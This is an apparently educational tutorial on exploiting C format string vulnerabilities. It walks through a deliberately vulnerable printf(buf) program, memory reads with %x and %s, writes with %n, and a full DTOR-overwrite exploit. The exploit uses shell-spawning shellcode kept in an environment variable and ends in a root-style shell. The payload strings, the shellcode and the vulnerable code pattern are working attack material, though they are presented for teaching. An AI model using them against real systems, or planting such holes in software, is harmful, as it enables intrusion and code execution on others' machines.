In many programming languages, the preferred way to print strings is through format strings. A format string lets a single call print text mixed with an arbitrary number of parameters of different data types. However, due to implementation details in languages such as C and C++, certain uses of functions that rely on format strings can make programs vulnerable to exploits. This type of vulnerability can be used to read arbitrary memory locations, or even to write to arbitrary memory locations (such as the return address). As such, format string vulnerabilities are an important security concern that all programmers should watch out for.
To better understand format strings, let’s take a look at a sample program that makes use of format strings. The program is simple: it has one 512-byte character array called buf, and upon running it uses strncpy to copy at most the first 511 bytes from argv[1] into buf. After strncpy has finished, printf is called on buf, and finally the program returns 0. Here’s the code:
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[512];
    strncpy(buf, argv[1], sizeof(buf) - 1);
    printf(buf);
    return 0;
}
Looking at the code, it should be clear that printf is the function which makes use of format strings. In this use, printf(buf), buf is treated as a format string. Format strings are evaluated with a special format function. This function parses the string passed to it, and replaces certain control characters with variables from the stack. For example, if one wanted to print the value of the integer variable i, they might use the following:
printf("Value of integer i: %d", i);
Format string control characters are actually sets of characters, but they all start with a %. Since the format function needs to be able to parse format strings with any number of control characters, it simply assumes each control character belongs to a parameter which was passed via the stack. While this assumption holds true in examples such as the integer printing example above, it doesn’t always hold in situations such as that in our program using printf(buf). Our printf(buf) example will work fine, and the string contents of buf will be printed to the screen, under one condition. This condition is that the string buf does not contain anything which might be interpreted as a control character. If buf does contain control characters, the format function will treat them as valid control characters and perform the corresponding action such as reading an integer from the stack. This ends up being a security vulnerability in that format strings allow for both reading and writing data, and if the stack hasn’t been initialized in the manner expected given the format string/control characters, then the data read/written can end up being arbitrary and end up causing unintended results.
To see an example of this vulnerability, let’s attempt to run our program and cause it to print the hex values held at the start of our string. To do this, let’s first look at the stack. Prior to printf being called, the “top” of the stack looks roughly like this:
[buf][argv][argc][spf][ra]
From here the printf function will be called, which will add to the top of the stack, so we’ll have to pop off a bit of data before we can get to our string. To pop values off the stack, we can use the %x control character. This control reads a 32-bit unsigned value from the stack and prints it in hex. So, let’s make a few attempts at running the program with format control characters to read hex values from the stack:
s9ghost@localhost:/tmp/.fsv$ ./test AAAABBBB.%x.%x.%x.%x.%x.%x.%x.%x
AAAABBBB.bfffde8d.1ff.10.7.bfffdae8.b29ce5.41414141.42424242
What is all this? Well, like we said, we have to use a few extra reads to move through some extra data on the stack from the call to printf. However, on the 7th and 8th reads, we found hex values which correspond to the AAAABBBB sequence at the start of our string. The deeper reason we’re able to read the value there is that the control character %x expects a 32-bit int, which would be placed by value onto the stack. Other control characters, such as %s, which prints a null-terminated string, behave slightly differently. Since strings aren’t passed by value but by reference, the value on the stack is a pointer to a string. Thus, if we use the control character %s, the value on the stack will be used as a pointer, and that location is where a string will be read from. This gives us another way to read from memory, and in fact lets us read strings from any arbitrary memory location if we can control what is next on the stack.
Well, since in the above example we were able to use %x to move to the start of our format string, let’s try writing a valid memory location at the start of our string and use the %s control character to de-reference that location and print the string stored there. First, though, we need a memory location that’ll work. For this exercise let’s assume we have the following string at 0xbfffdeb0: “TERM=xterm”. Next, we write the address in little-endian byte order, as our architecture requires:
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xb0\xde\xff\xbf","AAAABBBB.%x.%x.%x.%x.%x.%x.%s"'`
°Þÿ¿AAAABBBB.bfffde8c.1ff.10.7.bfffdae8.2c0ce5.RM=xterm
Now you can see that by using %x to advance to our own string on the stack, placing an address at the front of that string, and using a control character which de-references, we can read from an arbitrary memory location. However, format strings offer more control characters than the ones we’ve seen here. Specifically, the %n control writes to a variable, and it is through %n that format string vulnerabilities can also result in writes to arbitrary memory locations.
The %n control character is used to store the number of characters written so far into a variable. Like all control characters, it uses a value from the stack; however, since it stores an int into a variable, it expects the address of this variable to be on the stack. Thus, since we know we can supply values to the stack, if we can also control how many characters have been written, we might be able to overwrite an important area of memory. The careful thinker may have picked up on something at this point: if we need to write more characters to increase the value we’ll store with %n, won’t that move us past our stack location if we need to use more %x or other read controls? While this is true, writing and reading aren’t the same. Specifically, the %x control allows for formatting options, such as padding, which write additional characters without reading anything more from the stack. To pad a number, we simply tell %x how many characters we want the result to be. For an example, let’s look at this modified use of the %x control character.
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xb0\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x."'`
°Þÿ¿AAAABBBB.bfffde8d.1ff.00010.00007.bfffdae8.
Looking at the 3rd and 4th %x, we can see the addition of 05. The leading 0 designates that the value printed will be zero-padded, and the 5 specifies that at least 5 characters will be printed. The result is seen in the “00010” and “00007” that were printed instead of simply “10” and “7” as in the previous example without the padding options. Thus, it is through this zero-padding that we can increase the number of bytes printed without using additional control characters and consuming more of the stack. Now let’s attempt to re-write some memory. Let’s assume we’ve found the following memory location containing the following string:
(gdb) x/1s 0xbfffdedf
0xbfffdedf: "example=aaaa"
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
To write to memory, our format string starts out similar to the one for reading. In fact, let’s read first just to make sure we’re positioned correctly on the stack:
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xd1\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%s"'`
ßÞÿ¿AAAABBBB.bfffde7b.1ff.00010.00007.bfffdac8.51ece5.example=aaaa
So far, so good. Now if we use the %n control character instead of %s, we should be able to write to the address on the stack instead of reading from it. Let’s go ahead and do that using gdb, so that we can place breakpoints before and after printf to pause the program and check the values in memory to verify our results:
(gdb) run `perl -e 'print "\xd9\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x36 0x00 0x00 0x00
(gdb) cont
Continuing.
ÙÞÿ¿AAAABBBB.bfffde6d.1ff.00010.00007.bfffdaa8.ec5ce5.
Program exited normally.
At this point we’ve proven that we can write to a specific memory address. We also know we can pad some of our reads to change the value which we write to memory. However, how well would this work if we wanted to write, say, the memory address of some shellcode to an arbitrary memory location (like the return address or some other place that will be used as a code pointer)? If we wanted to write an address such as 0xbfffa00a in a single write, the character count would have to reach 3,221,200,906, which means roughly 3.2 billion characters of padding. This is far too large to pad effectively. What we can do instead is chain four small writes together, each setting one byte, to build up the address.
To chain together writes, we’re going to have to place four memory locations onto the stack via our format string. We must also, obviously, supply additional %n control characters. Let’s check out an example:
(gdb) run `perl -e 'print "\xd9\xde\xff\xbf", "\xda\xde\xff\xbf", "\xdb\xde\xff\xbf", "\xdc\xde\xff\xbf", "AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61 0x00 0x53 0x53 0x48
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x48
Now we’ve seen that we can control a full 32 bits of memory. The theory and details of format string vulnerabilities have been verified. However, to show the severity of format string vulnerabilities, let’s see if we can cause arbitrary code execution.
To cause code execution, we’re going to have to overwrite some area of memory with the address of the code we want executed. While we could try to write to the return address on the stack frame, another option is to take advantage of how GCC handles constructors and destructors in C programs. With the toolchain used here, every compiled program, whether it defines constructors or destructors or not, contains a constructor list and a destructor list. If a program doesn’t specify its own, these lists remain empty. The destructor list, for example, works by holding pointers to destructor functions. Thus, if we want to cause code execution, we can do it by appending the address of the code we want to execute to the end of the destructor list, and it will be run when the destructors are called at program exit. To write to the end of the destructor list, we’re going to need to know where it is. Luckily we can check this with the nm command as follows:
s9ghost@localhost:/tmp/.fsv$ nm ./test | grep DTOR
08049510 D __DTOR_END__
0804950c d __DTOR_LIST__
Since we need to write to the end of the list, we need to write to memory location 0x08049510. Let’s use that address as a base, and see if we can construct a format string which will overwrite it, similar to what we did above. Then let’s hit our breakpoints and examine the memory location to make sure it worked.
(gdb) run `perl -e 'print "\x10\x95\x04\x08", "\x11\x95\x04\x08", "\x12\x95\x04\x08", "\x13\x95\x04\x08", "AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x00
Now that we’ve got our format string overwriting the DTOR, the final thing we need to do is determine how to make our string write the values that represent the address of our arbitrary code. However, before doing that, we need to place some code into memory. Let’s use some Linux shellcode we got from packetstorm which will spawn a shell. Let’s also pad it with many no-ops at the beginning so we can be a little more lenient about which memory address we choose. (This is just for ease. It’s not necessary, and it’s probably not a good idea in actual environments, since NOP padding may trigger an IDS.) To place our shellcode in memory, we can assign it to an environment variable; we’ll use the variable SHELLCODE.
s9ghost@localhost:/tmp/.fsv$ export SHELLCODE=`perl -e 'print "\x90"x5000,"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
Now that our shellcode is placed in memory, let’s write a small C program to get the address of the environment variable holding our shellcode. This program and its use are shown next:
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    if(!argv[1])
        exit(1);
    /* %p with a void * cast is the portable way to print a pointer */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}

s9ghost@localhost:/tmp/.fsv$ ./getmem SHELLCODE
bfffcaf8
Now we have our code in memory, and we know where it is. So if we can jump to any memory location in the NOP padding of our shellcode, which occupies the first 5000 bytes starting at 0xbfffcaf8, we should be able to execute our shellcode.
Finally, let’s determine how much padding we need to write between uses of %n to correctly overwrite DTOR with our shellcode memory location. Remember that addresses are stored in memory in little-endian format and thus start with the least significant byte furthest to the left. First, let’s re-write our format string, adding %x controls between our %n’s so we can change the value written by each. We should also see what value is written by each %n and how much we need to alter the padding to get the results we want:
(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%08x.%n.%08x.%n.%08x.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0x58 0x62 0x6c 0x00 0x00 0x00 0x00
DTOR was correctly overwritten. Let’s look at the values. Since we have a large range of NOPs to jump to, we can leave the first value, 0x4e, alone, as it’s the least significant byte. However, based on the memory address we want to jump to, we’re going to have to change the second byte. Since we want to land somewhere in the 5000 bytes that start at 0xbfffcaf8, let’s try for 0xcb in the second byte of DTOR. To do this, we have to pad by the difference between the value already written, 0x58, and the value we want, 0xcb. Doing the math, 0xcb - 0x58 = 0x73, which is 115 decimal. Since the existing %08x already accounts for 8 characters, we add those 8 for a final width of 123. Let’s attempt this and check the value written again to make sure it works:
(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/.fsv/test `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xd5 0xdf 0x00 0x00 0x00 0x00
As you can see, it’s working. We’ve now written 0xcb to the second byte of DTOR. Next, we want to write 0xff to the third byte. Let’s take the same approach as before: 0xff - 0xd5 = 0x2a, which is 42 decimal, and adding the 8 characters of the existing width gives a final width of 50. Let’s test it again:
(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/.fsv/test `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0x09 0x01 0x00 0x00 0x00
Alright, one more byte to go. As you can see, the later byte values shift whenever we change an earlier padding. The most recent value for the 4th byte is now 0x09; the running count has passed 0xff, so its carry shows up as 0x01 in the following byte. Let’s do our math again: 0xbf - 0x09 = 0xb6, which is 182 decimal, and adding 8 for the existing width gives a total width of 190. Let’s put this in, check our values, and see what happens when the program finishes:
(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%0190x.%n"'`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.
Breakpoint 2, 0x08048437 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0xbf
(gdb) cont
Continuing. abcabcabcAAAABBBB.bfffca89.1ff.00010.00007.bfffc6c8.5d9ce5..000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261..00000000000000000000000000000000000000000064636261..0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261.
sh-4.1$
There we have it, a format string exploited to provide a shell.
Over the years, the format string landscape has changed. Many compilers now offer options that provide protection against certain format string attacks, such as the DTOR overwrite shown here. However, other ways of exploiting format string vulnerabilities exist and continue to be developed. We will talk about other format string exploit options, such as writing to the PLT/GOT or a stack return address, in future postings. Being able to read and write indiscriminately to and from memory is a major security flaw, and it is through this flaw that format string vulnerabilities make their mark on the computer security landscape.